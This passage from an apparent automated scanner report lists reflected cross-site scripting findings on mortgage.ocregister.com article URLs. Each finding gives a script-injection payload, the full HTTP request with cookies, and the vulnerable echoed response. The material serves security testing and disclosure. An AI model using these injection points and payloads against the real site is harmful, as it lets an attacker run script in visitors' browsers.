Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87cd4"><script>alert(1)</script>0a7d55204ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 87cd4\"><script>alert(1)</script>0a7d55204ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/?87cd4"><script>alert(1)</script>0a7d55204ed=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:09:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41340>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 80681


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
e=" CA. foreclosure starts fall, but more auctions set - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/?87cd4\"><script>alert(1)</script>0a7d55204ed=1feed/" />
...[SNIP]...

1.363. http://mortgage.ocregister.com/2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1aa0d"><script>alert(1)</script>b758a53c615 was submitted in the REST URL parameter 5. This input was echoed as 1aa0d\"><script>alert(1)</script>b758a53c615 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/14/newport-home-in-squatters-case-set-for-auction/413841aa0d"><script>alert(1)</script>b758a53c615/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:09:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:09:55 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
ternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/14/newport-home-in-squatters-case-set-for-auction/413841aa0d\"><script>alert(1)</script>b758a53c615/feed/" />
...[SNIP]...

1.364. http://mortgage.ocregister.com/2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27e8b"><script>alert(1)</script>6320bb6e639 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 27e8b\"><script>alert(1)</script>6320bb6e639 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/?27e8b"><script>alert(1)</script>6320bb6e639=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:09:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41384>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89941


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
port home in &#8216;squatting&#8217; case set for auction - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/?27e8b\"><script>alert(1)</script>6320bb6e639=1feed/" />
...[SNIP]...

1.365. http://mortgage.ocregister.com/2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5115"><script>alert(1)</script>56f1b51a9ac was submitted in the REST URL parameter 5. This input was echoed as a5115\"><script>alert(1)</script>56f1b51a9ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318a5115"><script>alert(1)</script>56f1b51a9ac/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:09:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:09:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318a5115\"><script>alert(1)</script>56f1b51a9ac/feed/" />
...[SNIP]...

1.366. http://mortgage.ocregister.com/2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf971"><script>alert(1)</script>7480d29f651 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf971\"><script>alert(1)</script>7480d29f651 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/?bf971"><script>alert(1)</script>7480d29f651=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:09:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41318>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81637


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
217;t hold your breath for a refund - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/?bf971\"><script>alert(1)</script>7480d29f651=1feed/" />
...[SNIP]...

1.367. http://mortgage.ocregister.com/2011/01/25/foreclosures-down-31-in-state/41514/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/25/foreclosures-down-31-in-state/41514/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e83f7"><script>alert(1)</script>7acb025cf16 was submitted in the REST URL parameter 5. This input was echoed as e83f7\"><script>alert(1)</script>7acb025cf16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/25/foreclosures-down-31-in-state/41514e83f7"><script>alert(1)</script>7acb025cf16/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:09:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:09:44 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/25/foreclosures-down-31-in-state/41514e83f7\"><script>alert(1)</script>7acb025cf16/feed/" />
...[SNIP]...

1.368. http://mortgage.ocregister.com/2011/01/25/foreclosures-down-31-in-state/41514/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/25/foreclosures-down-31-in-state/41514/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39195"><script>alert(1)</script>7289003fdd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 39195\"><script>alert(1)</script>7289003fdd6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/25/foreclosures-down-31-in-state/41514/?39195"><script>alert(1)</script>7289003fdd6=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:09:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41514>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 78706


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
ernate" type="application/rss+xml" title=" Foreclosures down 31% in state - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/25/foreclosures-down-31-in-state/41514/?39195\"><script>alert(1)</script>7289003fdd6=1feed/" />
...[SNIP]...

1.369. http://mortgage.ocregister.com/2011/01/26/7900-o-c-homes-seized-in-2010/41532/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/26/7900-o-c-homes-seized-in-2010/41532/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70fcf"><script>alert(1)</script>62ea07ed0d1 was submitted in the REST URL parameter 5. This input was echoed as 70fcf\"><script>alert(1)</script>62ea07ed0d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/26/7900-o-c-homes-seized-in-2010/4153270fcf"><script>alert(1)</script>62ea07ed0d1/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:09:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:09:54 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/26/7900-o-c-homes-seized-in-2010/4153270fcf\"><script>alert(1)</script>62ea07ed0d1/feed/" />
...[SNIP]...

1.370. http://mortgage.ocregister.com/2011/01/26/7900-o-c-homes-seized-in-2010/41532/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/26/7900-o-c-homes-seized-in-2010/41532/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7f46"><script>alert(1)</script>4549895a33a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a7f46\"><script>alert(1)</script>4549895a33a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/26/7900-o-c-homes-seized-in-2010/41532/?a7f46"><script>alert(1)</script>4549895a33a=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:09:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41532>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 115806


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
rnate" type="application/rss+xml" title=" 7,900 O.C. homes seized in 2010 - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/26/7900-o-c-homes-seized-in-2010/41532/?a7f46\"><script>alert(1)</script>4549895a33a=1feed/" />
...[SNIP]...

1.371. http://mortgage.ocregister.com/2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4962"><script>alert(1)</script>87890681c86 was submitted in the REST URL parameter 5. This input was echoed as e4962\"><script>alert(1)</script>87890681c86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590e4962"><script>alert(1)</script>87890681c86/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:09:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:09:38 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590e4962\"><script>alert(1)</script>87890681c86/feed/" />
...[SNIP]...

1.372. http://mortgage.ocregister.com/2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a36eb"><script>alert(1)</script>60713eca42a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a36eb\"><script>alert(1)</script>60713eca42a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/?a36eb"><script>alert(1)</script>60713eca42a=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:09:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41590>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83515


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
rss+xml" title=" $3.5 million Irvine foreclosure hits market - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/?a36eb\"><script>alert(1)</script>60713eca42a=1feed/" />
...[SNIP]...

1.373. http://mortgage.ocregister.com/2011/01/29/couple-might-be-better-off-with-short-sale/41502/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/29/couple-might-be-better-off-with-short-sale/41502/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5367a"><script>alert(1)</script>8c4f91db03b was submitted in the REST URL parameter 5. This input was echoed as 5367a\"><script>alert(1)</script>8c4f91db03b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/29/couple-might-be-better-off-with-short-sale/415025367a"><script>alert(1)</script>8c4f91db03b/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:09:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:09:50 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/29/couple-might-be-better-off-with-short-sale/415025367a\"><script>alert(1)</script>8c4f91db03b/feed/" />
...[SNIP]...

1.374. http://mortgage.ocregister.com/2011/01/29/couple-might-be-better-off-with-short-sale/41502/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/29/couple-might-be-better-off-with-short-sale/41502/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c45d"><script>alert(1)</script>8eb8cd1b964 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6c45d\"><script>alert(1)</script>8eb8cd1b964 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/29/couple-might-be-better-off-with-short-sale/41502/?6c45d"><script>alert(1)</script>8eb8cd1b964=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:09:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41502>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77827


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
/rss+xml" title=" Couple might be better off with short sale - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/29/couple-might-be-better-off-with-short-sale/41502/?6c45d\"><script>alert(1)</script>8eb8cd1b964=1feed/" />
...[SNIP]...

1.375. http://mortgage.ocregister.com/2011/02/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/02/

Issue detail

